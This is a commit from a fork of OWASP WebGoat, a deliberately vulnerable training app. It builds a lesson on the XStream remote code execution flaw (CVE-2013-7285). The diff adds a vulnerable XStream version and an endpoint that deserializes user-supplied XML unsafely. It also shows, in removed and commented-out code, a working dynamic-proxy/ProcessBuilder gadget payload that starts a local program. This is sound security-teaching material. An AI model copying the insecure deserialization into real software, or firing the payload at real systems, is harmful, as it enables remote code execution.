dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Xstream RCE works now

Browse Source
This commit is contained in:
mayhew64 2017-02-07 23:51:05 -05:00
parent 65d728dfff
commit 33e807797c
10 changed files with 161 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
webgoat-container/pom.xml
View File

@ -260,6 +260,12 @@
<version>0.4.10</version> <version>0.4.10</version>
</dependency> </dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.6</version>
</dependency>
<!-- ************* END spring MVC and related dependencies ************** --> <!-- ************* END spring MVC and related dependencies ************** -->
<!-- ************* START: Dependencies for Unit and Integration Testing ************** --> <!-- ************* START: Dependencies for Unit and Integration Testing ************** -->
<dependency> <dependency>

22
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/CatchAllConverter.java Normal file
View File

@ -0,0 +1,22 @@
package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.converters.Converter;
import com.thoughtworks.xstream.converters.MarshallingContext;
import com.thoughtworks.xstream.converters.UnmarshallingContext;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
public class CatchAllConverter implements Converter {
public boolean canConvert(Class clazz) {
return true;
}
public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
return null;
}
}

18
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/Contact.java Normal file
View File

@ -0,0 +1,18 @@
package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.annotations.XStreamAlias;
@XStreamAlias("contact")
public class Contact {
@XStreamAlias("name")
String name;
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
}

30
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/ContactConverter.java Normal file
View File

@ -0,0 +1,30 @@
package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.converters.Converter;
import com.thoughtworks.xstream.converters.MarshallingContext;
import com.thoughtworks.xstream.converters.UnmarshallingContext;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
public class ContactConverter implements Converter {
public boolean canConvert(Class clazz) {
return clazz.equals(Contact.class);
}
public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
Contact contact = (Contact) value;
writer.startNode("name");
writer.setValue(contact.getName());
writer.endNode();
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
Contact contact = new Contact();
reader.moveDown();
contact.setName(reader.getValue());
reader.moveUp();
return contact;
}
}

74
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/VulnerableComponentsLesson.java
View File

@ -1,6 +1,7 @@
package org.owasp.webgoat.plugin; package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.XStream; import java.io.IOException;
import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentPath; import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult; import org.owasp.webgoat.assignments.AttackResult;
@ -9,7 +10,8 @@ import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody; import org.springframework.web.bind.annotation.ResponseBody;
import java.io.IOException; import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
/** /**
* ************************************************************************************************* * *************************************************************************************************
@ -50,34 +52,50 @@ public class VulnerableComponentsLesson extends AssignmentEndpoint {
@RequestMapping(method = RequestMethod.POST) @RequestMapping(method = RequestMethod.POST)
public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException { public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException {
String process = "open";
String arguments = "/Applications/Calculator.app";
String payload2 = "<sorted-set>" +
"<string>foo</string>" + XStream xstream = new XStream(new DomDriver());
"<dynamic-proxy>" + // xstream.processAnnotations(Contact.class);
"<interface>java.lang.Comparable</interface>" + // xstream.registerConverter(new ContactConverter());
"<handler class=\"java.beans.EventHandler\">" + // xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
" <target class=\"java.lang.ProcessBuilder\">" +
" <command>" + // Contact c = new Contact();
" <string>" + process + "</string>" + // c.setName("Alvaro");
" <string>" + arguments + "</string>" + // String sc = xstream.toXML(c);
" </command>" + // System.out.println(sc);
" </target>" +
" <action>start</action>" +
"</handler>" + // String payload2 = "<sorted-set>" +
"</dynamic-proxy>" + // "<string>foo</string>" +
"</sorted-set>"; // "<dynamic-proxy>" +
XStream xstream = new XStream(); // "<interface>java.lang.Comparable</interface>" +
String xml = (String)xstream.fromXML(payload2); // "<handler class=\"java.beans.EventHandler\">" +
if (!payload.toString().equals("")) { // " <target class=\"java.lang.ProcessBuilder\">" +
return trackProgress(success() // " <command>" +
.feedback("vulnerable-components") // " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
.feedbackArgs(xml) // " </command>" +
.build()); // " </target>" +
} else { // " <action>start</action>" +
// "</handler>" +
// "</dynamic-proxy>" +
// "</sorted-set>";
try {
// System.out.println("Payload:" + payload);
Contact expl = (Contact) xstream.fromXML(payload);
return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build());
} catch (com.thoughtworks.xstream.converters.ConversionException ex) {
ex.printStackTrace();
if (ex.getMessage().contains("Integer"))
{
return trackProgress(success().feedback("vulnerable-components.success").build());
}
return trackProgress(failed().feedback("vulnerable-components.close").build()); return trackProgress(failed().feedback("vulnerable-components.close").build());
}
}
} }
} }

15
webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/html/VulnerableComponents.html
View File

@ -131,6 +131,12 @@
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files, <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc --> which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
<div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div> <div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
<div class="adoc-content" th:replace="doc:VulnerableComponents_content5a.adoc"></div>
<div class="attack-container"> <div class="attack-container">
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div> <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat --> <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
@ -143,8 +149,13 @@
<div id="lessonContent"> <div id="lessonContent">
<form accept-charset="UNKNOWN" method="POST" name="form" <form accept-charset="UNKNOWN" method="POST" name="form"
action="#attack/307/100" enctype=""> action="#attack/307/100" enctype="">
Enter Your XML payload: <input name="payload" value="" type="TEXT"/><input <table>
name="SUBMIT" value="Go!" type="SUBMIT"/> <tr>
<td>Enter the contact's xml representation:</td>
<td><textarea name="payload" value="" type="TEXT" rows="15" cols="60"/></td>
<td><input name="SUBMIT" value="Go!" type="SUBMIT"/></td>
</tr>
</table>
</form> </form>
</div> </div>
</form> </form>

11
webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content4c.adoc
View File

@ -4,18 +4,17 @@
* Is it old or is it stable * Is it old or is it stable
* Was my lack of upgrade a deliberate choice or a lack of knowledge * Was my lack of upgrade a deliberate choice or a lack of knowledge
=== What is architectural risk?
* Is my component out of date
* Is the project I'm using no longer active * Is the project I'm using no longer active
* Is my component unpopular * Is my component unpopular
=== Summary
* It's really difficult to keep components up to dat
=== Summary?
image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]
For the components analyzed in 25,000 applications it was found that: For the components analyzed in 25,000 applications it was found that:
* 8% of 2 year old components did not have a newer version * 8% of 2 year old components did not have a newer version
* 23% of 11 year old components did not have a newer version * 23% of 11 year old components did not have a newer version
image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]

6
webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content5.adoc
View File

@ -6,8 +6,8 @@ In November of 2015, the Apache Commons Collections component latest release was
Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit] Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit]
=== Dinis Cruz exploit of XStream === Dinis Cruz and pwntester exploit of XStream
XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] https://github.com/pwntester/XStreamPOC[pwntester/XStreamPOC]
Let's see if you can figure out how to exploit this in WebGoat. You may want to read the article(s) before trying this lesson. Let's see if you can figure out how to exploit this in WebGoat.

14
webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content5a.adoc Normal file
View File

@ -0,0 +1,14 @@
== Exploiting http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285[CVE-2013-7285] (XStream)
WebGoat Sends an XML document to add contacts to a contacts database.
[source,xml]
----
<contact>
<id>1</id>
<firstName>Bruce</firstName>
<lastName>Mayhew</lastName>
<email>webgoat@owasp.org</email>
</contact>
----
For this example, we will let you enter the xml directly versus intercepting the request and modifying the data. You provide the XML representation of a contact and WebGoat will convert it a Contact object using XStream.fromXML(xml).

3
webgoat-lessons/vulnerable-components/src/main/resources/plugin/i18n/WebGoatLabels.properties
View File

@ -1,3 +1,6 @@
vulnerable-components.title=Vulnerable Components vulnerable-components.title=Vulnerable Components
EnterYourName=Enter your Name EnterYourName=Enter your Name
Go!=Go! Go!=Go!
vulnerable-components.close=Trying to deserialize null object.
vulnerable-components.success=If you are not seeing the application you started; it may be minimized
vulnerable-components.fromXML=You created contact {0}. This means you did not exploit the remote code execution.